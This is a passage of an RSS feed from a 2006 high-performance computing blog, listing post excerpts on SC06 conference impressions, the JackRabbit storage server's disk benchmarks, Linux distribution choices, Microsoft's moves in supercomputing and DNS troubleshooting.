      <guid>https://blog.scalability.org/2006/12/the-black-art-of-prediction/</guid>
      <description>As this is the last day of 2006, many pundits are making bold, or in some case, ridiculous, predictions about the future. Some have even made predictions about the past, a bizarre action to be sure, but one that seems to have happened.
Prediction is an art. Some times it goes wrong. Badly wrong. Sometimes good companies make bad decisions based upon bad predictions. This is in part why SGI dropped the Beast and Alien in the late 90&amp;rsquo;s to hop on board the Itanium express.</description>
    </item>
    
    <item>
      <title>Supposedly obvious predictions</title>
      <link>https://blog.scalability.org/2006/12/supposedly-obvious-predictions/</link>
      <pubDate>Sun, 31 Dec 2006 04:29:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/12/supposedly-obvious-predictions/</guid>
      <description>/. linked to some predictions for the next year. Three of them pertain to HPC.
Before I get into the three predictions, let me point out that predicting events that have already happened is not generally hard. This is important for the first prediction. He indicates that Itanium is on life support, and that HP is trying to get out of its deal with Intel. Apparantly he is not aware that this appears to have already happened.</description>
    </item>
    
    <item>
      <title>Software appliances:  rPath</title>
      <link>https://blog.scalability.org/2006/12/software-appliances-rpath/</link>
      <pubDate>Wed, 20 Dec 2006 17:57:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/12/software-appliances-rpath/</guid>
      <description>Now that I have complained aloud about conary, which is the package management bit in rPath, let me praise the idea behind rPath.
No, no one prompted me. No nastygrams. My major issue is with Conary, the distribution builder, and the decisions that must have gone into it. Punchline: rPath works, though conary is proving to be more of a pain than RPM, it is even less apparant to me how to build an appliance than I would like it to be, and integrating things we need to integrate in, such as lots of perl modules, lots of other bits, is a non-starter due to the issues in dealing with conary and their distribution build system.</description>
    </item>
    
    <item>
      <title>The many joys of Redhat based linux distributions: part 1, filesystems and conary</title>
      <link>https://blog.scalability.org/2006/12/the-many-joys-of-redhat-based-linux-distributions-part-1-filesystems-and-conary/</link>
      <pubDate>Tue, 19 Dec 2006 01:57:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/12/the-many-joys-of-redhat-based-linux-distributions-part-1-filesystems-and-conary/</guid>
      <description>A customer has a JackRabbit. They want to install Scientific Linux 4.4 (SL4.4) on it. Ok.
Holding back on the criticism of the positively ancient kernel in RHEL4 derived distributions, its weak NUMA support, and other issues. Lets look at file systems. JackRabbit is a server. A 5U monster that can push tremendous amounts of data around; to disk, from disk, out onto the network. It needs a relatively modern kernel to make best use of its chipsets, which aren&amp;rsquo;t supported before 2.</description>
    </item>
    
    <item>
      <title>Legal shenanigans or not</title>
      <link>https://blog.scalability.org/2006/12/legal-shenanigans-or-not/</link>
      <pubDate>Wed, 06 Dec 2006 13:47:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/12/legal-shenanigans-or-not/</guid>
      <description>PJ over at Groklaw.net is often a fun read. Her commentary on the SCO case has been excellent, if not loaded with biting sarcasm and witty humor. I think that this is good, as SCO deserves the derision heaped upon it for lighting off a case that their overlords appear to have asked for, without checking to see whether or not it was real enough to push.
In business as in parenting, you have to learn to pick your fights.</description>
    </item>
    
    <item>
      <title>On business models and markets</title>
      <link>https://blog.scalability.org/2006/12/on-business-models-and-markets/</link>
      <pubDate>Wed, 06 Dec 2006 03:31:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/12/on-business-models-and-markets/</guid>
      <description>or why is the volume desktop market leader interested in a small market like Supercomputing.
I can&amp;rsquo;t answer that one easily, as the return on their investment will be low. It would behoove any Microsoft shareholder to ask the management team at the annual shareholder meeting why they are going after something so small relative to other more profitable and larger markets. I cannot fathom the business model that they have for this.</description>
    </item>
    
    <item>
      <title>The missing windows in top500</title>
      <link>https://blog.scalability.org/2006/12/the-missing-windows-in-top500/</link>
      <pubDate>Wed, 06 Dec 2006 03:10:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/12/the-missing-windows-in-top500/</guid>
      <description>I read this article about the state of windows machines in the top500 list of &amp;ldquo;fastest&amp;rdquo; supercomputers. Remember that Microsoft indicates that it has no interest in the top500, and given its purported strategy, that sounds like it is correct, that they shouldn&amp;rsquo;t care about &amp;ldquo;non-mainstream&amp;rdquo; supercomputers.
Since Microsoft appears to want to make supercomputers appear to be simply big PCs that are out of sight, focusing on top500 doesn&amp;rsquo;t make much sense.</description>
    </item>
    
    <item>
      <title>Myths and hype: first of likely many articles</title>
      <link>https://blog.scalability.org/2006/12/myths-and-hype-first-of-likely-many-articles/</link>
      <pubDate>Sun, 03 Dec 2006 16:48:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/12/myths-and-hype-first-of-likely-many-articles/</guid>
      <description>We have spoken to many customers as of late about storage. Apparantly there is this new high performance physical interconnect akin to the venerable and aging Fibre Channel, SCSI, and other related technologies. Its name? iSCSI. Can you tell whats wrong with this?
The customers can&amp;rsquo;t. And we can blame the marketing hype machines for this situation. iSCSI is new, is quite interesting, and is the right solution for many users.</description>
    </item>
    
    <item>
      <title>SuSE and Microsoft: as the world turns ...</title>
      <link>https://blog.scalability.org/2006/11/suse-and-microsoft-as-the-world-turns/</link>
      <pubDate>Tue, 28 Nov 2006 15:04:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/suse-and-microsoft-as-the-world-turns/</guid>
      <description>Ok, so the soap opera title may in fact be appropriate. When the deal was first announced, reading over the press release had me thinking that a good convergence was in order. We were seeing Microsoft finally (correctly) decide that working with Linux was a good thing for it. Then the Microsoft execs opened their mouths.
What they managed to do is to give ammunition to all the people in the community opposed to such deals, a large, well &amp;hellip; no &amp;hellip; a huge bolus of things to be concerned about, and further to give them an unfortunately large platform upon which to (correctly) shout that they were in fact right.</description>
    </item>
    
    <item>
      <title>SC06 wrap up: thoughts on what I did not see or hear</title>
      <link>https://blog.scalability.org/2006/11/sc06-wrap-up-thoughts-on-what-i-did-not-see-or-hear/</link>
      <pubDate>Tue, 28 Nov 2006 07:09:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/sc06-wrap-up-thoughts-on-what-i-did-not-see-or-hear/</guid>
      <description>From the last post, you can read some of what I did see and hear. This is about what was missing.
 Applications: The folks from Microsoft showed off excel running on a cluster. Some of the others showed &amp;ldquo;trivial&amp;rdquo; or booth-specific applications. These weren&amp;rsquo;t real things in most cases, they were smaller &amp;ldquo;toy&amp;rdquo; apps or models. Maybe I missed it, but I did not see many applications that demanded supercomputing.</description>
    </item>
    
    <item>
      <title>SC06 wrap up: thoughts on what I saw and heard</title>
      <link>https://blog.scalability.org/2006/11/sc06-wrap-up-thoughts-on-what-i-saw-and-heard/</link>
      <pubDate>Tue, 28 Nov 2006 06:37:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/sc06-wrap-up-thoughts-on-what-i-saw-and-heard/</guid>
      <description>Well, SC06 is now history. Reno is the next venue. Maybe we will have a bit of a booth then. So what happened, what was extraordinary, what was ordinary?
This is kind of hard. Last year, there was so much cool stuff, this year, well, somewhat less cool stuff. The exhibit did not seem as big this year, or as lively. Looked like lots of vendors talking to each other. I had a distinct sense that this was a high tech equivalent of a red light district &amp;hellip; Ok&amp;hellip; lets be more focused.</description>
    </item>
    
    <item>
      <title>SC06 wrapup summary</title>
      <link>https://blog.scalability.org/2006/11/sc06-wrapup-summary/</link>
      <pubDate>Mon, 27 Nov 2006 18:28:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/sc06-wrapup-summary/</guid>
      <description>Ok, been promising to post this, so I am going to break it up into chunks. I will report on what I saw, what I didn&amp;rsquo;t see, and what I wanted to see. Will break each of these up into posts on its own for better manageability.</description>
    </item>
    
    <item>
      <title>Thoughts about what support is, and what it isn&#39;t</title>
      <link>https://blog.scalability.org/2006/11/thoughts-about-what-support-is-and-what-it-isnt/</link>
      <pubDate>Mon, 27 Nov 2006 17:48:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/thoughts-about-what-support-is-and-what-it-isnt/</guid>
      <description>These thoughts are randomly coursing through my mind as I sit here waiting on the support number for HP. I purchased an HP laptop for business use about 2 years ago, and it has had a few problems. It&amp;rsquo;s a great unit: AMD64, 1 GB ram, big disk, nVidia graphics. Would love to get something like this again when I buy the next one in about 6-9 months.
Most recent issues have been with the lid and the USB ports.</description>
    </item>
    
    <item>
      <title>HPCS has chosen, and the winners are ...</title>
      <link>https://blog.scalability.org/2006/11/hpcs-has-chosen-and-the-winners-are/</link>
      <pubDate>Thu, 23 Nov 2006 01:36:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/hpcs-has-chosen-and-the-winners-are/</guid>
      <description>Cray and IBM. Congratulations to them. HPCS is about making supercomputers more productive for end users. How to leverage tremendous efficiencies, build better languages for faster, better, more accurate development. I was very impressed with Chapel. IBM&amp;rsquo;s looked like a Java derivative, as verbose and opaque as Java usually is (it is often hard to discern what Java is doing from Java source).
Regardless of this, now we can see where this will go.</description>
    </item>
    
    <item>
      <title>Bandwidth as a natural limiting factor for technological evolution</title>
      <link>https://blog.scalability.org/2006/11/bandwidth-as-a-natural-limiting-factor-for-technological-evolution/</link>
      <pubDate>Tue, 21 Nov 2006 06:09:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/bandwidth-as-a-natural-limiting-factor-for-technological-evolution/</guid>
      <description>Ok, this has been bouncing around in my head for a while now. Been trying to work up something to really describe it correctly in terms of a mathematical model. I have an idea, but too little time to work on it.
Here is the hypothesis. Information technologies gradually evolve to a point where their performance is fundamentally limited by their interconnection bandwidth. Recent examples of this are multicore chips. No matter how much bandwidth you throw at something, if you hold that bandwidth, that fixed resource constant, and simply increase the number of cycles available, or if you prefer, the &amp;ldquo;size&amp;rdquo; of the resource, then at some point in time you will approach a point where the of resource contention will dominate, and you have to actively work to hide communication behind calculation.</description>
    </item>
    
    <item>
      <title>That didn&#39;t take long ...</title>
      <link>https://blog.scalability.org/2006/11/that-didnt-take-long/</link>
      <pubDate>Tue, 21 Nov 2006 05:18:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/that-didnt-take-long/</guid>
      <description>The folks at /. have linked to an open letter to the OSS community from Novell. This impacts HPC in that much of HPC is done on Linux, a large and growing fraction if you look at Top500 and other measures.
Here is why I thought it was a good thing.
Yes. Exactly. Companies &amp;hellip; no &amp;hellip; customers want interoperability. Moreover, they don&amp;rsquo;t really like it when their suppliers start suing each other, or them.</description>
    </item>
    
    <item>
      <title>And the FUD begins in earnest ... (mostly non-HPC)</title>
      <link>https://blog.scalability.org/2006/11/and-the-fud-begins-in-earnest-mostly-non-hpc/</link>
      <pubDate>Mon, 20 Nov 2006 21:17:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/and-the-fud-begins-in-earnest-mostly-non-hpc/</guid>
      <description>Ok, so color me amused. I knew that it would not take long, and sure enough, the **&amp;ldquo;independent **bloggers&amp;rdquo; doing marketing for various organizations have fired their second shot. The first one is the &amp;ldquo;Linux is too hard&amp;rdquo; meme that seems to have died the quiet death it deserved. This next one is unfortunately as laughable as it shows a fundamental misunderstanding of something critical.
This meme could be called &amp;ldquo;Open Source is Dangerous&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>Must be deja vu</title>
      <link>https://blog.scalability.org/2006/11/must-be-deja-vu/</link>
      <pubDate>Sat, 18 Nov 2006 14:40:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/must-be-deja-vu/</guid>
      <description>I haven&amp;rsquo;t had a chance to do more posts or a wrap up of SC06. I will do this soon. I want to briefly point out this article. And offer a mea culpa.
Briefly, I had a discussion with Patrick of the Microsoft team about Microsoft&amp;rsquo;s goals and vision. You know, if you just remove the CEO&amp;rsquo;s occasional statements about his competitor being a virus, a cancer, and so on, the vision isn&amp;rsquo;t bad, and is something that we can work with.</description>
    </item>
    
    <item>
      <title>SC06 Day-1 photos are up</title>
      <link>https://blog.scalability.org/2006/11/sc06-day-1-photos-are-up/</link>
      <pubDate>Wed, 15 Nov 2006 06:32:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/sc06-day-1-photos-are-up/</guid>
      <description>Here.</description>
    </item>
    
    <item>
      <title>SC06 Day-1 part 3</title>
      <link>https://blog.scalability.org/2006/11/sc06-day-1-part-3-2/</link>
      <pubDate>Wed, 15 Nov 2006 06:10:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/sc06-day-1-part-3-2/</guid>
      <description>Why 3 parts? Well why do two when a third is just 50% more &amp;hellip; The universities: are out in force. Excellent stuff. If you get a chance, go by the SUNY Buffalo booth (UB booth) and pick up the MPI-HMMer page. JP and Vipin have worked hard on this code, and they deserve serious kudos it. Many more things to talk about, more tomorrow. With regards to the Microsoft dinner, I do regret missing this.</description>
    </item>
    
    <item>
      <title>SC06 Day-1 part 2</title>
      <link>https://blog.scalability.org/2006/11/sc06-day-1-part-2/</link>
      <pubDate>Wed, 15 Nov 2006 06:08:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/sc06-day-1-part-2/</guid>
      <description>Why 2 parts? It seems that in posting blogs from hotel rooms, they may somehow limit the amount you can upload to a web site. Not sure why, but it fails to work while here, though it works great elsewhere.
The point about making more power open to wider groups of people, and more accessible to larger groups of people is critical. Driving the computing to the desktop, though there was, how shall I put this, spirited discussion, about whether a &amp;ldquo;cluster under the desktop&amp;rdquo; made sense, the message is clear.</description>
    </item>
    
    <item>
      <title>SC06 Day-1 part 1</title>
      <link>https://blog.scalability.org/2006/11/sc06-day-1-part-1/</link>
      <pubDate>Wed, 15 Nov 2006 06:03:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/sc06-day-1-part-1/</guid>
      <description>First off, I missed the very thing I was most looking forward to, in large part due to getting caught up in a great BoF, run by a friend and former colleague. This was my fault, I had fully intended to have dinner with the Microsoft team. My apologies to them and to the other guests. More about this a little later.
I am uploading pictures/photos/movies, including about 15 minutes of Ray Kurzweil&amp;rsquo;s keynote.</description>
    </item>
    
    <item>
      <title>More SC06 blogs</title>
      <link>https://blog.scalability.org/2006/11/more-sc06-blogs/</link>
      <pubDate>Tue, 14 Nov 2006 03:28:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/more-sc06-blogs/</guid>
      <description>Doug Eadline and Jeff Layton are blogging at ClusterMonkey. Gala happened, we missed it. Went out to dinner a little ways down the street. Solved the camera issue. I hope. Set up a place for SC06 pictures/movies on the photo site. Hopefully it will be obvious which are SC06 &amp;hellip; Going to be there early tomorrow. Will try lots of pictures/movies.</description>
    </item>
    
    <item>
      <title>SC06:  All registered</title>
      <link>https://blog.scalability.org/2006/11/sc06-all-registered/</link>
      <pubDate>Mon, 13 Nov 2006 20:26:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/sc06-all-registered/</guid>
      <description>Picked up Jim at the airport, then made our way over. All registered. Saw lots of people already. Had some good conversations. I forgot how energy draining this is. Need to increase caloric intake.
That and coffee. Doesn&amp;rsquo;t seem to be much in the way of coffee shops down here. Need to google about for that. The biggest &amp;ldquo;loss&amp;rdquo; from last year were the fleece sweaters. Sure, this is Florida, and we shouldn&amp;rsquo;t need sweaters &amp;hellip; got two mugs.</description>
    </item>
    
    <item>
      <title>SC06 begins ...</title>
      <link>https://blog.scalability.org/2006/11/sc06-begins/</link>
      <pubDate>Mon, 13 Nov 2006 13:01:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/sc06-begins/</guid>
      <description>ok, so it is later tonight, officially, at the &amp;ldquo;Gala&amp;rdquo; event. The &amp;ldquo;usual crew&amp;rdquo; of bloggers will be there, as will lots of friends and colleagues from the past. Someone once told me that Supercomputing is quite incestuous: they steal &amp;hellip; er hire from each other with abandon. It is always enjoyable to visit and see friends with new business cards, new digs, and similar stories of how company X is in the decline and Y is ascendent.</description>
    </item>
    
    <item>
      <title>Arrived at SC06</title>
      <link>https://blog.scalability.org/2006/11/arrived-at-sc06/</link>
      <pubDate>Mon, 13 Nov 2006 04:27:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/arrived-at-sc06/</guid>
      <description>Getting here was fun. Most everything went without a hitch. The TSA did not appreciate the larger sized toothpaste and shaving cream in my carry-on. I&amp;rsquo;ll refrain from commenting on this.
I managed to leave my camera at home. Go figure. I will work out a way to get photos posted to http://photos.scalability.org . Hopefully not cell-phone quality, but real ones. Tomorrow night is the opening gala. Then tuesday night is Beo-bash, and the folks at Microsoft have invited a few people to have dinner.</description>
    </item>
    
    <item>
      <title>What is L. Flavigularis</title>
      <link>https://blog.scalability.org/2006/11/what-is-l-flavigularis/</link>
      <pubDate>Mon, 13 Nov 2006 04:19:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/what-is-l-flavigularis/</guid>
      <description>Ok, I have been hinting at something we have been working on for a while. Time to talk a little more about this.
This is a server we are calling &amp;ldquo;JackRabbit&amp;rdquo;. The L. Flavigularis is a particular sub-species of JackRabbit. It comes in 3U and 5U flavors, and as a storage unit, could support from 6 TB through 36 TB, with 2 to 8 processor cores, and up to 64 GB ram, with multiple gigabit ethernet, Infiniband, and other technologies.</description>
    </item>
    
    <item>
      <title>A hint of things to come ...</title>
      <link>https://blog.scalability.org/2006/11/a-hint-of-things-to-come/</link>
      <pubDate>Fri, 10 Nov 2006 03:46:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/a-hint-of-things-to-come/</guid>
      <description>Some of my collaborators should have a very interesting announcement about an accelerated life science application coming out soon. Stay tuned&amp;hellip;</description>
    </item>
    
    <item>
      <title>Yet another not so useful test, learning more things about Linux IO</title>
      <link>https://blog.scalability.org/2006/11/yet-another-not-so-useful-test-learning-more-things-about-linux-io/</link>
      <pubDate>Fri, 10 Nov 2006 02:07:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/yet-another-not-so-useful-test-learning-more-things-about-linux-io/</guid>
      <description>for our little conejo (L. Flavigularis). Create a 128 GB file. Filled with zeros.
[root@jackrabbit 2]# time dd if=/dev/zero of=big_file bs=1024000000 count=128 128+0 records in 128+0 records out real 3m59.539s user 0m0.000s sys 3m38.978s [root@jackrabbit 2]# ls -alF big_file -rw-rw---- 1 root landman 131072000000 Nov 8 22:11 big_file [root@jackrabbit 2]# du -h big_file 123G big_file  Call it 4 minutes. 240 seconds, to create a 123 GB file. This is a little north of 500 MB/s write.</description>
    </item>
    
    <item>
      <title>Maximizing the minimum performance</title>
      <link>https://blog.scalability.org/2006/11/maximizing-the-minimum-performance/</link>
      <pubDate>Fri, 10 Nov 2006 01:27:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/maximizing-the-minimum-performance/</guid>
      <description>Our little L. Flavigularis is shaping up nicely. IOzone tests are, well, quite respectable (bug me at SC06 about this if you are interested). I expect to see some serious FUD from competitors, especially if they get a look at the numbers. And that concerns me, as I am not at all convinced that IOzone and its ilk represent real measurements of meaningful items. I have a strong sense of a &amp;ldquo;herd&amp;rdquo; mentality/effect.</description>
    </item>
    
    <item>
      <title>L. Flavigularis  update</title>
      <link>https://blog.scalability.org/2006/11/l-flavigularis-update/</link>
      <pubDate>Wed, 08 Nov 2006 03:58:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/l-flavigularis-update/</guid>
      <description>We took L. Flavigularis out to to a test track in a manner of speaking. IOzone to be specific. We cracked the throttle a bit. Not flat out. Just a speed trial.
Wow &amp;hellip;. This little critter is fast. The previous numbers &amp;hellip; are at the low end of the range.</description>
    </item>
    
    <item>
      <title>The joy of (broken) DNS</title>
      <link>https://blog.scalability.org/2006/11/the-joy-of-broken-dns/</link>
      <pubDate>Tue, 07 Nov 2006 00:58:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/the-joy-of-broken-dns/</guid>
      <description>landman@balto ~ $ ping jackrabbit &amp;lt;!-- more --&amp;gt; landman@balto ~ $ nslookup !$ nslookup jackrabbit Server: crunch-r.scalableinformatics.com Address: x.y.z.t Name: jackrabbit Address: 192.168.1.155 landman@balto ~ $ ping jackrabbit ping: unknown host jackrabbit  Oh&amp;hellip; it gets better. Run strace on ping jackrabbit. I want to know where the failure is. I&amp;rsquo;ll tell you why in a minute.
 487 246858 [main] ping 3308 sig_send: returning 0x0 from sending signal -34 21823 268681 [main] ping 3308 wsock_init: res 0 607 269288 [main] ping 3308 wsock_init: wVersion 514 313 269601 [main] ping 3308 wsock_init: wHighVersion 514 6813 276414 [main] ping 3308 wsock_init: szDescription WinSock 2.</description>
    </item>
    
    <item>
      <title>Initial impressions of Socket F/1207 machine</title>
      <link>https://blog.scalability.org/2006/11/initial-impressions-of-socket-f1207-machine/</link>
      <pubDate>Sun, 05 Nov 2006 15:16:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/initial-impressions-of-socket-f1207-machine/</guid>
      <description>We have a machine we are building in the lab now. I am running all sorts of code on it. My impressions?
It is a somewhat better Opteron than Opteron. The tests I have run to date indicate that the 2.6 GHz unit is on par with, if not slightly faster than the Woodcrest 2.66 GHz unit. This is mostly heavy computational code: GAMESS runs, a weather code for a customer, and others.</description>
    </item>
    
    <item>
      <title>This is a good thing, if it is real</title>
      <link>https://blog.scalability.org/2006/11/this-is-a-good-thing-if-it-is-real/</link>
      <pubDate>Thu, 02 Nov 2006 22:00:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/this-is-a-good-thing-if-it-is-real/</guid>
      <description>Saw this on /. then followed it to the WSJ.. If this is real, then this is a good thing. SuSE is IMO one of the better distributions of Linux, certainly quite professional, and they use a modern kernel.
This latter issue is quite important. The 2.6.9 kernel in some dominant north american distributions is dangerously out of date IMO, as they do not support modern hardware without serious effort. SATA was not properly supported until their U2 release of the v4 product.</description>
    </item>
    
    <item>
      <title>Windsprints with L. flavigularis</title>
      <link>https://blog.scalability.org/2006/11/windsprints-with-l-flavigularis/</link>
      <pubDate>Thu, 02 Nov 2006 16:39:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/windsprints-with-l-flavigularis/</guid>
      <description>Taking our little L. flavigularis for a few tests. Its motherboard needs the 2.6.17 and above kernels. Used Ubuntu Edgy Eft (6.10) for it. Even had the latest version of the drivers we needed built in. Install was easy. The specs on the unit are incredible (initial performance data below). Built the disk arrays (ok, started the build, it takes a while). 26TB RAID6 usable before formatting. Cool. 25TB after formatting.</description>
    </item>
    
    <item>
      <title>Woodcrest update, day N&#43;1</title>
      <link>https://blog.scalability.org/2006/11/woodcrest-update-day-n1/</link>
      <pubDate>Wed, 01 Nov 2006 14:14:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/11/woodcrest-update-day-n1/</guid>
      <description>So we have had a woodcrest in house for a while now. When we have time we beat on it, we ran codes on it. My impressions are now well formed, and I understand where it makes sense as a platform, and where the competitive technologies make sense. This is not from marketing documents, but from real world testing.
Woodcrest is basically an AMD64 platform without the IOMMU. The processor architecture includes a much improved SSE engine, a larger shared cache, and theoretically, a larger memory bandwidth than its competitor.</description>
    </item>
    
    <item>
      <title>OT: Just say no (to RBL)</title>
      <link>https://blog.scalability.org/2006/10/ot-just-say-no-to-rbl/</link>
      <pubDate>Tue, 31 Oct 2006 23:30:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/ot-just-say-no-to-rbl/</guid>
      <description>While spam is on the rise, some people resort to battlefield thermonuclear weapons to solve the issue, not caring about the grave damage they do to legitimate users.
Specifically RBLs. RBLs are an old technology. The idea is that you don&amp;rsquo;t filter content, you block the source. This way you don&amp;rsquo;t ever have to deal with content you aren&amp;rsquo;t interested in. They blocking subnets. Things were good. Until someone noticed that legitimate users, who had the IPs in those subnets were being banned.</description>
    </item>
    
    <item>
      <title>Must have hit a nerve with that one ...</title>
      <link>https://blog.scalability.org/2006/10/must-have-hit-a-nerve-with-that-one/</link>
      <pubDate>Tue, 31 Oct 2006 19:46:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/must-have-hit-a-nerve-with-that-one/</guid>
      <description>A number of folks have spoken to me offline now about this post. Seems like a number of &amp;ldquo;vendors&amp;rdquo; drop boxes off that sometimes work, and sometimes do not. Anyone have experience with this they would like to share?</description>
    </item>
    
    <item>
      <title>Not a bandwidth record, but ...</title>
      <link>https://blog.scalability.org/2006/10/not-a-bandwidth-record-but/</link>
      <pubDate>Tue, 31 Oct 2006 19:03:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/not-a-bandwidth-record-but/</guid>
      <description>Ok&amp;hellip; I moved 34.5 TB between two sites in about 30 minutes. This is a hair under 70 TB/hour. About 19.4 GB/s. Not bad, eh?
The technology that brought you this? A 10 year old jeep. I carried 46 x 750 GB drives in my truck as I moved them from site A to site B, about 30 miles (~50km) apart.</description>
    </item>
    
    <item>
      <title>The (lack of) quality of motherboards</title>
      <link>https://blog.scalability.org/2006/10/the-lack-of-quality-of-motherboards/</link>
      <pubDate>Tue, 31 Oct 2006 01:17:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/the-lack-of-quality-of-motherboards/</guid>
      <description>We do everything we can to stop failing subsystems from ever entering our customers hands. We beat on our systems, usually with loads far in excess of what our customers will do. No, not using memtest. We run real codes. And we catch lots of problems.
What surprises me, really gets to me, is that some motherboard makers (who shall remain nameless) ship product to their customers (us) for integration into our products, or as subsystems into products we buy from others, and this product does not work.</description>
    </item>
    
    <item>
      <title>Built for raw firepower</title>
      <link>https://blog.scalability.org/2006/10/built-for-raw-firepower/</link>
      <pubDate>Thu, 26 Oct 2006 06:23:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/built-for-raw-firepower/</guid>
      <description>Working on a cool project, hopefully I will get to say something soon about it. If you are at SC06, and you see me, ask me about it.
I installed its brain (a pair of Opteron 2218&amp;rsquo;s) and lungs today. Have a few other bits to install; our L. flavigularis is taking shape. Taking pictures as I go. Will post after we are complete. After it is finished, will apply the power.</description>
    </item>
    
    <item>
      <title>The &#34;good enough&#34; factor, or how to make yourself irrelevant in the market</title>
      <link>https://blog.scalability.org/2006/10/the-good-enough-factor-or-how-to-make-yourself-irrelevant-in-the-market/</link>
      <pubDate>Tue, 24 Oct 2006 05:09:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/the-good-enough-factor-or-how-to-make-yourself-irrelevant-in-the-market/</guid>
      <description>This post has been through countless iterations. I have written/rewritten it a multitude of times, because I was looking for a way to say it, but never quite settled on a particular manner. So here it is &amp;hellip; stream of conciousness and all that.
We had lost a few bids recently, and while I don&amp;rsquo;t want to comment on to whom or for whom, I want to comment on &amp;ldquo;why&amp;rdquo;. The reason I want to comment on the &amp;ldquo;why&amp;rdquo; is that it has importance to the market, and those whom forget this &amp;ldquo;why&amp;rdquo; are doomed to make the same mistakes.</description>
    </item>
    
    <item>
      <title>(semi-live) blogging SC06</title>
      <link>https://blog.scalability.org/2006/10/semi-live-blogging-sc06/</link>
      <pubDate>Tue, 24 Oct 2006 01:34:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/semi-live-blogging-sc06/</guid>
      <description>Well I am all registered. I plan on using a better camera this year, and reading the manual in advance. No more sideways movies (sheesh!). Photos / movies will be at photos.scalability.org .
I may show a bias towards accelerated computing and accelerated processing, so please forgive this in advance. If there are particular items that you think are interesting, please let me know. It is a big show, and it is hard to see all/most of it.</description>
    </item>
    
    <item>
      <title>Of small decisions, large migrations come to pass</title>
      <link>https://blog.scalability.org/2006/10/of-small-decisions-large-migrations-come-to-pass/</link>
      <pubDate>Tue, 24 Oct 2006 01:23:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/of-small-decisions-large-migrations-come-to-pass/</guid>
      <description>I had heard of some changes in the windows licensing model. Windows licensing is relevant if you are building a windows cluster, as you now have a new set of costs and usage restrictions atop your machine, that you simply don&amp;rsquo;t have with the alternatives.
Lets focus upon the question that cluster builders have to face. So you have this nice shiny new cluster with 30 or so new machines. You know you are going to cycle machines in and out of the cluster.</description>
    </item>
    
    <item>
      <title>This is wrong... so very, very wrong ...</title>
      <link>https://blog.scalability.org/2006/10/this-is-wrong-so-very-very-wrong/</link>
      <pubDate>Sat, 21 Oct 2006 15:27:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/this-is-wrong-so-very-very-wrong/</guid>
      <description>I was searching for some data on drift/group velocity of charge carriers in semiconductors for something I am working on. Yeah, I know, nice stuff to google for. I ran across this. I nearly fell out of my chair.</description>
    </item>
    
    <item>
      <title>The right tools for the job</title>
      <link>https://blog.scalability.org/2006/10/the-right-tools-for-the-job/</link>
      <pubDate>Sun, 15 Oct 2006 03:53:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/the-right-tools-for-the-job/</guid>
      <description>Reading through some of the most interesting papers at the upcoming SC06 show. Yes, we will be there wandering around. I read an interesting paper from the originators of mpiBLAST. They had a great quote about developing very high performance computing tools, specifically in terms of tying multiple other tools together. They used Perl to do this. For good reason. Here is the quote:
I am not trying to denigrate C/C++.</description>
    </item>
    
    <item>
      <title>The long term impact of poor decisions and implementations</title>
      <link>https://blog.scalability.org/2006/10/the-long-term-impact-of-poor-decisions-and-implementations/</link>
      <pubDate>Fri, 13 Oct 2006 19:09:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2006/10/the-long-term-impact-of-poor-decisions-and-implementations/</guid>
      <description>We often get interesting requirements for clusters. Sometimes we speak to people who believe that clock frequency defines the speed of the unit, so therefore, a 3.6 GHz processor must be faster than a 2.66 GHz processor. This is not the case (clock frequency == performance), but it has been hammered home by one OEM (cough cough) for a long time, so their customers are attuned to it. Makes it hard to explain to a customer how a 2.</description>
    </item>
    
    <item>
      <title>Drinking the koolaid, by the megaliter</title>
      <link>https://blog.scalability.org/2006/10/drinking-the-koolaid-by-the-megaliter/</link>
